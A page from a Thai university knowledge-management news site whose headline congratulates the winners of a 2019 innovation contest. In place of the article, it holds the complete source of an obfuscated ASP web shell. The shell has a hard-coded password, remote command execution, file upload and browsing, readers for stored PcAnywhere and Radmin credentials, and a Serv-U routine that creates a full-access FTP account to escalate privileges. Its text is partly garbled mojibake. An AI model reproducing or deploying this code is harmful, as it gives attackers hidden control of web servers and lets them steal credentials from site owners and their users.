เว็บไซต์การจัดการความรู้ของ มสธ. ยินดีต้อนรับ | Log in | สมัครสมาชิก

ข่าวสารการจัดการความรู้

 

ขอแสดงความยิมดีกับผู้ชนะการประกวดนวัตกรรมและแนวปฏิบัติที่ดีประจำปีงบประมาณ พ.ศ. 2562

6/27/2019อ่าน 904  

 
<%@ LANGUAGE = VBScript.encode%><% Server.ScriptTimeout=999999999 UserPass ="xpxp1234"' ���� mNametitle ="Web Shell"' �������� Copyright ="Web Shell"' ��Ȩ���� bs=False ShowFileIco=False IcoPath="" durl="" Response.Buffer =true On Error Resume Next strBAD="" Const DEfd="" sub ShowErr() If Err Then j"

" & Err.Description & "

" Err.Clear:Response.Flush End If end sub Sub j(str) response.write(str) End Sub Function RePath(S) RePath=Replace(S,"\","\\") End Function Function RRePath(S) RRePath=Replace(S,"\\","\") End Function URL=Request.ServerVariables("URL") OOOO=Request.ServerVariables("PATH_TRANSLATED") ServerIP=Request.ServerVariables("LOCAL_ADDR") Action=Request("Action") RootPath=Server.MapPath(".") WWWRoot=Server.MapPath("/") FolderPath=Request("FolderPath") ServerU=ReQueST.SERVervaRIables("http_host")&url serverp=UserPass FName=Request("FName") Function ShiSanFun(ShiSanObjstr) ShiSanObjstr = Replace(ShiSanObjstr, "��", """") For ShiSanI = 1 To Len(ShiSanObjstr) If Mid(ShiSanObjstr, ShiSanI, 1) <> "��" Then ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) + ShiSanNewStr Else ShiSanNewStr = vbCrLf + ShiSanNewStr End If Next ShiSanFun = ShiSanNewStr End Function cdx="":cxd="8":ef="" set fso=server.CreateObject("Scripting.FileSystemObject") set fsoX=server.CreateObject("Scripting.FileSystemObject") str1=""&Request.ServerVariables("SERVER_Name"):BackUrl="

����
" j""&mNametitle&" - "&ServerIP&" " if bs=true then:j"" j"" Dim ObT(18,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "�� �� �� �� �� ��":ObT(1,0) = "wscript.shell":ObT(1,2) = "������ִ�����,��ʾ'��'ʱ�� ִ��Cmd�� �˹���ִ��":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS �� �� �� ��":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS ѹ �� �� ��":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "������ �� �� ���� ���":ObT(5,0) = "Adodb.connection":ObT(5,2) = "���ݿ� ���� ���":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "������ �ϴ� ���":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp �ļ� �ϴ� ���":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "���Ʒ� �ļ� �ϴ� ���":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload �ļ� �ϴ� ���":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail �ʼ� �շ� ���":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "����SMTP ���� ���":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail ���� ���":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "���� ���� ���" ObT(14,0) = "ws"&"cript.shell.1": OBt(14,2) = "���wsh���������Ը���������":OBT(15,0) = "WS"&"CRIPT.NETWORK": OBt(15,2) = "�鿴��������Ϣ���������ʱ����������Ȩ":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation ��������FSOʱ�����ļ��Լ�ִ������":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation �ı�������FSOʱ�����ļ��Լ�ִ������":OBT(18,0) = "Shell.Users":OBt(18,2) = "ɾ����net.exe net1.exe������������û������" For i=0 To 18:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ��":Else:IsObj=" ��":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if sWHEEL1 = "jwt" Function Encrypt(acd) For i = 1 To Len(acd) step 1 c=mid(acd,i,1) if c="��" then d=mid(acd,i,2) i=i+1 e=replace(d,"��","") bbc=bbc&mid(sWHEEL1,cint(e),1) else bbc=bbc&c end if next Encrypt=bbc end Function Function PcAnywhere4() j"
PcAnywhere��Ȩ Bin�汾
cif�ļ�:
" end Function j"
" Function StreamLoadFromFile(sPath) Dim oStream Set oStream = Server.CreateObject("Adodb.Stream") With oStream .Type = 1 .Mode = 3 .Open .LoadFromFile(sPath) .Position = 0 StreamLoadFromFile = .Read .Close End With Set oStream = Nothing End Function Function hexdec(strin) Dim i, j, k, result result = 0 For i = 1 To Len(strin) If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then j = 15 End If If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then j = 14 End If If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then j = 13 End If If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then j = 12 End If If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then j = 11 End If If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then j = 10 End If If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then j = CInt(Mid(strin, i, 1)) End If For k = 1 To Len(strin) - i j = j * 16 Next result = result + j Next hexdec = result End Function Function PcAnywhere(data,mode) HASH= Mid(data,3) If mode = "pass" Then number = 32: Cifnum = 144 If mode = "user" Then number = 30: Cifnum = 15 For i = 1 To number Step 2 pcstr=((hexdec(Mid(data,i,2)) xor hexdec(Mid(hash,i,2))) xor Cifnum) If ((pcstr <= 32) Or (pcstr>127)) Then Exit For decode = decode + Chr(pcstr) Cifnum=Cifnum+1 Next PcAnywhere=decode End function Function bin2hex(binstr) For i = 1 To LenB(binstr) hexstr = Hex(AscB(MidB(binstr, i, 1))) If Len(hexstr)=1 Then bin2hex=bin2hex&"0"&(LCase(hexstr)) Else bin2hex=bin2hex& LCase(hexstr) End If Next End Function CIF = Request("path") If CIF <> "" Then BinStr=StreamLoadFromFile(CIF) j"Pcanywhere Reader ==>

PATH:"&CIF&"
�ʺ�:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user") j"
����:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass") End If Function radmin() Set WSH= Server.CreateObject("WSCRIPT.SHELL") RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\" Parameter="Parameter" Port = "Port" j"
ע��:����HASHֵ����RadminHash���߻�od�������ӣ��������ص�ַ:"&htp&"soft/Radmin_hash.rar

" ParameterArray=WSH.REGREAD(RadminPath & Parameter ) j Parameter&":" If IsArray(ParameterArray) Then For i = 0 To UBound(ParameterArray) If Len (hex(ParameterArray(i)))=1 Then strObj = strObj & "0"&CStr(Hex(ParameterArray(i))) Else strObj = strObj & Hex(ParameterArray(i)) End If Next j strobj Else j"Error! Can't Read!" End If j"

" PortArray=WSH.REGREAD(RadminPath & Port ) If IsArray(PortArray) Then j Port &":" j hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0)))) Else j"Error! Can't Read!" End If End Function Function hextointer(strin) Dim i, j, k, result result = 0 For i = 1 To Len(strin) If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then j = 15 End If If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then j = 14 End If If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then j = 13 End If If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then j = 12 End If If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then j = 11 End If If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then j = 10 End If If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then j = CInt(Mid(strin, i, 1)) End If For k = 1 To Len(strin) - i j = j * 16 Next result = result + j Next hextointer = result End Function:Function MainForm() execute(shisanfun("���>elbat/<>rt/<>dt/<>emarfi/<>'1'=redrobemarf '%001'=thgieh '%001'=htdiw 'eliF1wohS=noitcA?'=crs 'emarFeliF'=eman emarfi<>dt<>dt/<>emarfi/<>'0'=redrobemarf '%59'=thgieh '%001'=htdiw 'uneMniaM=noitcA?'=crs 'tfeL'=eman emarfi<>'071'=htdiw dt<>rt<>rt/<>dt/<>elbat/<>mrof/<>rt/<>dt/<��j:fi dne:��ko��=)��.��(noisses:)urevres&���(egapptthteg&�� ;psbn&;psbn&;psbn&;psbn&;psbn&��j:neht ��ko�� >< )��udiab��(noisses fi:��>a<������resullA��)01(>')�������\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a< >a<��erehwynAcp��)9(>')���erehwynAcp\\cetnamyS\\ataD noitacilppA\\1~esulla\\1~emucod\\:c���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<;psbn&;psbn&;psbn&>a<���м���lerp��)8(>')���lerp\\:c���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��lqssM��)7(>')���\\revreS LQS tfosorciM\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<;psbn&;psbn&;psbn&;psbn&;psbn&;psbn&>a<��PHP��)6(>')���php\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<;psbn&;psbn&>a<��SWODNIW��)5(>')���SWODNIW\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<;psbn&>a<��)2(UvreS��)4(>')���UvreS\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��)1(UvreS��)3(>')���moc.tfoSonihR\\seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<;psbn&;psbn&;psbn&;psbn&>a<��PMET��)2(;psbn&;psbn&>')���pmeT\\SWODNIW\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��bupmw��)1(>')���bupmw\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>rb<��j:fi dne:��ko��=)��sRP��(noisses:��>;psbn&��j:neht ��ko�� >< )��sRP��(noisses fi:��>a<��)\:e(RELCYCER��)01(>')���relcycer\\:e���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��)\:d(RELCYCER��)9(>')���relcycer\\:D���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��)\:C(RELCYCER��)8(>')���relcycer\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<����_�̡�)7(>')���\\���\\���ˡ�ʼ����\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<���β�_ʼ�_��)6(>')���\\���ˡ�ʼ����\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��sresU_llA��)5(>')���\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��stnemucoD��)4(>')���stnemucoD\\sresU llA\\sgnitteS dna stnemucoD\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��EmargorP��)3(>')���seliF margorP\\:e���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��DmargorP��)2(>')���seliF margorP\\:d���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>a<��margorP��)1(>')���seliF margorP\\:C���(redloFwohS:tpircsavaj'=ferh ma=ssalc a<>rt<>emarfi/<>'1'=redrobemarf '%001'=thgieh '%001'=htdiw 'eliF1wohS=noitcA?'=crs 'emarFeliF'=eman emarfi<>dt<>'242424#:dnuorgkcab'=elyts 1=htdiw dt<>dt/<>p/<>a/<>b/<ʾ��>b<>##=ferh ���''=yalpsid.elyts.)'lt'(dIyBtnemelEteg.tnemucod���=kcilcno a<>p<>a/<>b/<����>b<>##=ferh ���'enon'=yalpsid.elyts.)'lt'(dIyBtnemelEteg.tnemucod���=kcilcno a<>'xp2:gniddap'=elyts 1=htdiw dt<>dt/<>'000000#:dnuorgkcab'=elyts 1=htdiw dt<>dt/<>emarfi/<>'0'=redrobemarf '%001'=thgieh '%001'=htdiw 'uneMniaM=noitcA?'=crs 'tfeL'=eman emarfi<>lt=di '061'=htdiw dt<>'0'=gnicapsllec '0'=gniddapllec ';000000# dilos xp1:redrob'=elyts '%5.59'=thgieh '%001'=htdiw elbat<>elbat/<>mrof/<>rt/<>dt/<>')(daoler.noitacol.emarFeliF'=kcilcno '��ˢ'=eulav 'timbus'=epyt tupni< >'OG'=eulav 'timbus'=epyt 'timbuS'=eman tupni<>'retnec'=ngila '041'=htdiw dt<>dt/<>'��&)��htaPredloF��(noisseS&��'=eulav '%001:htdiw'=elyts 'htaPredloF'=eman tupni<>dt<>dt/<��ַ��>'retnec'=ngila '06'=htdiw dt<>rt<>'tnerap_'=tegrat '��&LRU&��'=noitca 'tsop'=dohtem 'mrofrdda'=eman mrof<>'%001'=htdiw elbat<>mrof/<>���emaNF���=eman ���neddih���=epyt tupni<>���noitcA���=eman ���neddih���=epyt tupni<>���emarFeliF���=tegrat ����&LRU&����=noitca ���tsop���=dohtem ���mrofedih���=eman mrof<��j")) End Function ExeCuTe(ShiSanFun("buS dnE��gnihtoN = redloFeht teS��txeN��fI dnE��fI dnE��etadpU.sr��)(daeR.maerts = )��tnetnoCelif��(sr��)htaP.meti(eliFmorFdaoL.maerts��)4 ,htaP.meti(diM = )��htaPeht��(sr��weNddA.sr��nehT 0 =< )��$�� & emaN.meti & ��$�� ,tsiLeliFsys(rtSnI fI��eslE ��maerts ,sr ,htaP.meti bdMroFeerTas��nehT eurT = redloFsI.meti fI��smetI.redloFeht nI meti hcaE roF��)htaPeht(ecapSemaN.Xas = redloFeht teS���$bdl.HSH$bdm.HSH$�� = tsiLeliFsys��tsiLeliFsys ,redloFeht ,meti miD��)maerts ,sr ,htaPeht(bdMroFeerTas buS��buS dnE��pooL��fI dnE��0 = i��eslE ��)��\�� ,)1 + i ,htaPeht(diM(rtsnI + i = i��nehT )��\�� ,)1 + i ,htaPeht(diM(rtSnI fI��fI dnE��))1 - i ,htaPeht(tfeL(redloFetaerC.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS��nehT eslaF = ))i ,htaPeht(tfeL(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI��0 > i elihW oD��)��\�� ,htaPeht(rtsnI = i��i miD��)htaPeht(redloFetaerc buS��buS dnE��gnihtoN = nnoc teS��gnihtoN = maerts teS��gnihtoN = sr teS��gnihtoN = sw teS��esolC.maerts��esolC.nnoc��esolC.sr��pooL��txeNevoM.sr��2 ,)��htaPeht��(sr & rts eliFoTevaS.maerts��)��tnetnoCelif��(sr etirW.maerts��)(soEteS.maerts��fI dnE��)redloFeht & rts(redloFetaerc��nehT eslaF = )redloFeht & rts(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI��))��\�� ,)��htaPeht��(sr(veRrtSnI ,)��htaPeht��(sr(tfeL = redloFeht��foE.sr litnU oD��1 = epyT.maerts��nepO.maerts��1 ,1 ,nnoc ,��ataDeliF�� nepO.sr��rtSnnoc nepO.nnoc���;�� & htaPeht & ��=ecruoS ataD;0.4.BDELO.teJ.tfosorciM=redivorP�� = rtSnnoc��)��noitcennoC.BDODA��(tcejbOetaerC = nnoc teS��)��maertS.BDODA��(tcejbOetaerC = maerts teS��)��teSdroceR.BDODA��(tcejbOetaerC = sr teS���\�� & )��.��(htaPpaM.revreS = rts��redloFeht ,rtSnnoc ,maerts ,nnoc ,rts ,sw ,sr miD��000001=tuOemiTtpircS.revreS��txeN emuseR rorrE nO��)htaPeht(kcaPnu buS��)emanf&��\��&toorwww(eliFtxeTetaerC.osf=esonpser tes��noitcnuF dnE��gnihtoN = redloFeht teS��gnihtoN = sredlof teS��gnihtoN = selif teS��txeN��fI dnE��etadpU.sr��)(daeR.maerts = )��tnetnoCelif��(sr��)htaP.meti(eliFmorFdaoL.maerts��)4 ,htaP.meti(diM = )��htaPeht��(sr��weNddA.sr��nehT 0 =< )��$�� & emaN.meti & ��$�� ,tsiLeliFsys(rtSnI fI��selif nI meti hcaE roF��txeN��maerts ,sr ,htaP.meti bdMroFeerTosf��sredlof nI meti hcaE roF��sredloFbuS.redloFeht = sredlof teS��seliF.redloFeht = selif teS��)htaPeht(redloFteG.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS = redloFeht teS��fI dnE��)��!�ʷ����ʲ��߻��ڴ治¼Ŀ �� & htaPeht(rrEwohs��nehT eslaF = )htaPeht(stsixEredloF.)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS fI���$bdl.HSH$bdm.HSH$�� = tsiLeliFsys��tsiLeliFsys ,selif ,sredlof ,redloFeht ,meti miD��)maerts ,sr ,htaPeht(bdMroFeerTosf noitcnuF��buS dnE��gnihtoN = golataCoda teS��gnihtoN = maerts teS��gnihtoN = nnoc teS��gnihtoN = sr teS��esolC.maerts��esolC.nnoC��esolC.sr��fI dnE��maerts ,sr ,htaPeht bdMroFeerTas��eslE ��maerts ,sr ,htaPeht bdMroFeerTosf��nehT ��osf�� = )��dohteMeht��(tseuqeR fI��3 ,3 ,nnoc ,��ataDeliF�� nepO.sr��1 = epyT.maerts��nepO.maerts��)��)egamI tnetnoCelif ,rahCraV htaPeht ,DERETSULC YEK YRAMIRP )1,0(YTITNEDI tni dI(ataDeliF elbaT etaerC��(etucexE.nnoc��rtSnnoc nepO.nnoc��rtSnnoc etaerC.golataCoda��)��bdm.HSH��(htaPpaM.revreS & ��=ecruoS ataD ;0.4.BDELO.teJ.tfosorciM=redivorP�� = rtSnnoc��)��golataC.XODA��(tcejbOetaerC.revreS = golataCoda teS��)��noitcennoC.BDODA��(tcejbOetaerC.revreS = nnoc teS��)��maertS.BDODA��(tcejbOetaerC.revreS = maerts teS��)��teSdroceR.BDODA��(tcejbOetaerC.revreS = sr teS��golataCoda ,rtSnnoc ,maerts ,nnoc ,sr miD��txeN emuseR rorrE nO��)htaPeht(bdMoTdda buS��buS dnE���>mrof/<��¼Ŀ��̱���λ������������������ :ע>rb<>rb<>'������'=eulav timbus=epyt tupni<>tcAeht=eman bdMmorFesaeler=eulav neddih=epyt tupni<>08=ezis ���bdm.HSH\�� & ))��.��(htaPpaM.revreS(edocnElmtH & ����=eulav htaPeht=eman tupni<>))���#���(noisseS(etucexE=eulav ���#���=eman neddih=epyt tupni<>tsop=dohtem mrof<>/rb<:)��֧OSF��(���������>/rh<>mrof/<��¼Ŀ��ͬ��ľmas��λ,����bdm.HSH�������� :ע>rb<>rb<>'����ʼ��'=eulav timbus=epyt tupni<>tceles/<>noitpo/ppa=eulav noitpo<>noitpo/osf=eulav noitpo<>dohteMeht=eman tceles<>tcAeht=eman bdMoTdda=eulav neddih=epyt tupni<>08=ezis ���� & ))��.��(htaPpaM.revreS(edocnElmtH & ����=eulav htaPeht=eman tupni<>))���#���(noisseS(etucexE=eulav ���#���=eman neddih=epyt tupni<>tsop=dohtem mrof<:����м���>rb<��j��fI dnE��dnE.esnopseR��lrUkcaB&��>vid/rb<>retnec=ngila vid<�� j��)htaPeht(kcaPnu��nehT ��bdMmorFesaeler�� = tcAeht fI��fI dnE��dnE.esnopseR��lrUkcaB&��>vid/rb<>retnec=ngila vid<�� j��)htaPeht(bdMoTdda��nehT ��bdMoTdda�� = tcAeht fI��000001=tuOemiTtpircS.revreS��)��htaPeht��(tseuqeR = htaPeht��)��tcAeht��(tseuqeR = tcAeht��htaPeht ,tcAeht miD��)(bdMoTddAegaP buS��")) Function ProFile() execute(shisanfun("IS j���>elbat/<>mrof/<��&IS=IS���>rt/<>dt/<>'�̽�������������һ��'=eulav 'timbuS'=eman 'timbus'=epyt tupni<>05=thgieh dt<>dt/<;psbn&>dt<>rt<��&IS=IS���>rt/<>dt/<)������ȫ������񣬴�Խ������Ƶ����Խ���ĵĻ���Ҫ�裬��1ΪС��( �� >/ ���)'',g/]d\^[/(ecalper.eulav=eulav���=puyekno ���5���=ezis ���1���=eulav ���thgir:ngila-txet���=elyts ���emiTA���=eman ���txet���=epyt tupni<>dt<>dt/<����Ƶ����>thgir=ngila dt<>rt<��&IS=IS���>rt/<>dt/<)���ĸ��Գ��룬�����ֳ��������ʷ�( 8-FTU>/ ���2���=eulav ���rahCA���=eman ���oidar���=epyt tupni< 2132BG>/ dekcehc ���1���=eulav ���rahCA���=eman ���oidar���=epyt tupni<>dt<>dt/<��������>thgir=ngila dt<>rt<��&IS=IS���>rt/<>dt/<>aeratxet/<�������>���7���=swor ���07���=sloc ���edoCA���=eman aeratxet<>dt<>dt/<���������>thgir=ngila ���;xp3:pot-gniddap���=elyts pot=ngilav dt<>rt<��&IS=IS���>rt/<>dt/<>aeratxet/<��&)��psa.tset\��&)��htaPredloF��(noisseS(htaPeRR&��>���7���=swor ���07���=sloc ���eliFA���=eman aeratxet<��&IS=IS���>dt<>dt/<>tnof/<;psbn&;psbn&��·���ĸ�һ��ÿ>rb<;psbn&;psbn&���ĸ��໤��ʱͬ��>wolley=roloc tnof<>rb<����·���ĵĻ���Ҫ��>���0���=eulav ���avvv���=eman ���neddih���=epyt tupni<>thgir=ngila 'xp22:thgieh-enil'=elyts pot=ngilav dt<>rt<��&IS=IS���'tsoP=2noitcA&eliForP=noitcA?��&LRU&��'=noitca 'tsop'=dohtem 'mroFpU'=eman mrof<��&IS=IS���>'0'=gnicapsllec '0'=gniddapllec '0'=redrob elbat<>rb<��=IS��fI dnE��dnE.esnopseR���>rb<>retnec/<���̽�����>a/<����>knalb_=tegrat ��&2ssap&��=eliForP?��&LRU&��=ferh ���dlob:thgiew-tnof;enilrednu:noitaroced-txet���=elyts a<���㣡���ɳ��� >tnof/<��&2ssap&��>wolley=roloc tnof< �̽�����>retnec<>rb<>rb<>rb<��j��)��rahCA��(tseuqer=)��rahC��&2ssap(noitacilppA��)��emiTA��(tseuqer=)��emiT��&2ssap(noitacilppA��)��edoCA��(tseuqer=)��edoC��&2ssap(noitacilppA��)��eliFA��(tseuqer=)��eliF��&2ssap(noitacilppA��1=)2ssap(noitacilppA��)2ssap(esacu=2ssap�� pool��1mun&2ssap=2ssap��fi dne�� 9~0' ))84+dnr*)84-75((rhC(rtSC=1mun��esle�� z~a' ))79+dnr*)79-221((rhC(rtSC=1mun��neht 4=<)2ssap(neL fi��8<)2ssap(neL elihW oD����=2ssap��1mun,2ssap mid��ezimodnaR��nehT ��tsoP��=)��2noitcA��(tseuqeR fI��")) End Function Function suftp() execute(shisanfun("fi dne��gnihton=3TSOPx teS��)sevael(dneS.3tsoPx��eurT ,��sevael/��& trop &��:1.0.0.721//:ptth�� ,��TSOP�� nepO.3tsoPx��)��PTTHLMX.2LMXSM��(tcejbOetaerC = 3tsoPx teS��flrcbv & resut & ��=resU �� & flrcbv & tropt & ��=oNtroP-�� & flrcbv & ��0.0.0.0=PI-�� & flrcbv & ��RESUETELED-�� & sevael = sevael��flrcbv & ��ECNANETNIAM ETIS�� & sevael = sevael��flrcbv & dwp & �� ssaP�� & sevael = sevael��flrcbv & rsU & �� resU�� = sevael��esle��)��>RB<>rb<): �� & htapt & �� :��· �� & ssapt & �� :���ܩ� & �� �� & resut & �� :������ PTF������ִ����������( j��gnihton=TSOPx teS��)sevael(dneS.tsoPx��eurT ,��sevael/��& trop &��:1.0.0.721//:ptth�� ,��TSOP�� nepO.tsoPx��)��PTTHLMX.2LMXSM��(tcejbOetaerC = tsoPx teS��txeN emuseR rorrE nO��flrcbv & ��PDCLEMAWR|\�� & htapt & ��=sseccA �� & flrcbv & ��enoN=soitaR-�� & flrcbv & ��ralugeR=epyTdrowssaP-�� & flrcbv & ��metsyS=ecnanetniaM-���_ & flrcbv & ��0=mumixaMatouQ-�� & flrcbv & ��0=tnerruCatouQ-�� & flrcbv & ��0=tiderCsoitaR-�� & flrcbv & ��1=nwoDoitaR-���_ & flrcbv & ��1=pUoitaR-�� & flrcbv & ��0=eripxE-�� & flrcbv & ��1-=tuOemiTnoisseS-�� & flrcbv & ��006=tuOemiTeldI-�� & flrcbv & ��1-=sresUrNxaM-���_ & flrcbv & ��0=nwoDtimiLdeepS-�� & flrcbv & ��0=pUtimiLdeepS-�� & flrcbv & ��1-=PIrePnigoLsresUxaM-�� & flrcbv & ��0=elbanEatouQ-���_ & flrcbv & ��0=drowssaPegnahC-�� & flrcbv & ��0=nigoLwollAsyawlA-�� & flrcbv & ��0=neddiHediH-�� & flrcbv & ��0=eruceSdeeN-���_ & flrcbv & ��1=shtaPleR-�� & flrcbv & ��0=elbasiD-�� & flrcbv & ��=eliFseMnigoL-�� & flrcbv & ��\�� & htapt & ��=riDemoH-���_ & flrcbv & ssapt & ��=drowssaP-�� & flrcbv & resut & ��=resU-�� & flrcbv & tropt & ��=oNtroP-�� & flrcbv & ��0.0.0.0=PI-�� & flrcbv & ��PUTESRESUTES-�� & sevael = sevael��flrcbv & ��ECNANETNIAM ETIS�� & sevael = sevael��flrcbv & dwp & �� ssaP�� & sevael = sevael��flrcbv & rsU & �� resU�� = sevael��nehT ��dda�� = )��nottuboidar��(mroF.tseuqer fi��)��dmcd��(mroF.tseuqer = dnammoC'��)��tropt��(mroF.tseuqer = tropt��)��htapt��(mroF.tseuqer = htapt��)��ssapt��(mroF.tseuqer = ssapt��)��resut��(mroF.tseuqer = resut��)��tropd��(mroF.tseuqer = trop��)��dwpd��(mroF.tseuqer = dwp��)��resud��(mroF.tseuqer = rsU���>retnec/<>mrof/<>elbat/<>rt/<>dt/<>'1'=eulav 'noitca'=di 'neddih'=epyt 'noitcaUS'=eman tupni<>'teseR'=eulav '2timbuS'=eman 'teser'=epyt tupni<;psbn&>'oG tsuJ'=eulav 'timbuS'=eman 'timbus'=epyt tupni<>d=di '2'=napsloc dt<>'elddim'=ngilav 'retnec'=ngila rt<>rt/<>dt/<��ɾ��ȷ>d=di 'xoBtxeT'=ssalc 'led'=eulav 'nottuboidar'=eman 'oidar'=epyt tupni<;psbn&������ȷ>d=di 'xoBtxeT'=ssalc dekcehc 'dda'=eulav 'oidar'=epyt 'nottuboidar'=eman tupni<>d=di dt<>dt/<��������ִ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'12'=eulav 'tropt'=di 'xoBtxeT'=ssalc 'txet'=epyt 'tropt'=eman tupni<>d=di dt<>dt/<���ڶ����>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'\:C'=eulav 'htapt'=di 'xoBtxeT'=ssalc 'txet'=epyt 'htapt'=eman tupni<>d=di dt<>dt/<����·�ʷ�>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'1'=eulav 'ssap'=di 'xoBtxeT'=ssalc 'txet'=epyt 'ssapt'=eman tupni<>d=di dt<>dt/<����ڼ���>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'redavni'=eulav 'resut'=di 'xoBtxeT'=ssalc 'txet'=epyt 'resut'=eman tupni<>d=di dt<>dt/<�����˼���>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'85934'=eulav 'tropd'=di 'xoBtxeT'=ssalc 'txet'=epyt 'tropd'=eman tupni<>d=di dt<>dt/<���ڶ�ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'P@0;kl.#ka$@l#'=eulav 'dwpd'=di 'xoBtxeT'=ssalc 'txet'=epyt 'dwpd'=eman tupni<>d=di dt<>dt/<�����ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>'rotartsinimdAlacoL'=eulav 'resud'=di 'xoBtxeT'=ssalc 'txet'=epyt 'resud'=eman tupni<>d=di dt<>dt/<������ͳϵ>d=di dt<>'retnec'=ngila rt<>rt/<>dt/<>b/<Ϣ�ű���ɼ�>B< >tnof/<8>sgnidbew=ecaf tnof<>s=di '2'=napsloc dt<>'elddim'=ngilav 'retnec'=ngila rt<>'005'=htdiw elbat<>''=noitca 'tsop'=dohtem '1mrof'=eman mrof<>rb<>retnec<��j��")) End Function Function MainMenu() j"":If ObT(0,1)=" ��" Then j"" Else j"" End If j"
"&mName&"

��Ȩ��
" Set ABC=New LBF:j ABC.ShowDriver():Set ABC=Nothing j"
8 վ���Ŀ¼"&ef j cdx&""&cxd&" ������Ŀ�"&ef j cdx&""&cxd&" ���ϼ�Ŀ¼"&ef j cdx&""&cxd&" �½�--Ŀ�"&ef j cdx&""&cxd&" �½�--�ı�"&ef j cdx&""&cxd&" �ϴ�--�ļ�"&ef j cdx&""&cxd&" ִ��---CMD"&ef j cdx&""&cxd&" ִ��--CMD2"&ef j cdx&""&cxd&" ����--Ȩ��"&ef j cdx&""&cxd&" �ű�--̽��"&ef j cdx&""&cxd&" ���������"&ef j cdx&""&cxd&" ����--�ļ�"&ef&"

